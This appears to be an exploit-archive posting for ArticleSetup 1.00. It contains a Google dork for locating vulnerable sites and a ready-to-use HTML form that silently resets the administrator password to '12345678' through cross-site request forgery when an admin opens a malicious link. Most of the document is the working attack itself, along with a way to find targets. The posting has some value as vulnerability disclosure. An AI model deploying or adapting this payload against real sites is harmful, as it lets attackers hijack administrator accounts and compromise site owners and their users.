ArticleSetup 1.00 Cross Site Request Forgery
Posted on 10 June 2016
<!-- # Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password # Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing # Date: 2016/06/04 # Exploit Author: Ali Ghanbari # Vendor Homepage: http://articlesetup.com/ # Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip # Version: 1.00 #Desc: When admin click on malicious link , attacker can login as a new Administrator with the credentials detailed below. #Exploit: --> <html> <body> <form method="post" action=" http://localhost/{PACH}/admin/adminsettings.php"> <input type="hidden" name="update" value="1"> <input type="hidden" name="pass1" type="hidden" value="12345678" > <input type="hidden" name="pass2" type="hidden" value="12345678" > <input type="submit" value="create"> </form> </body> </html> <!-- #################################### [+]Exploit by: Ali Ghanbari [+]My Telegram :@Exploiter007 -->
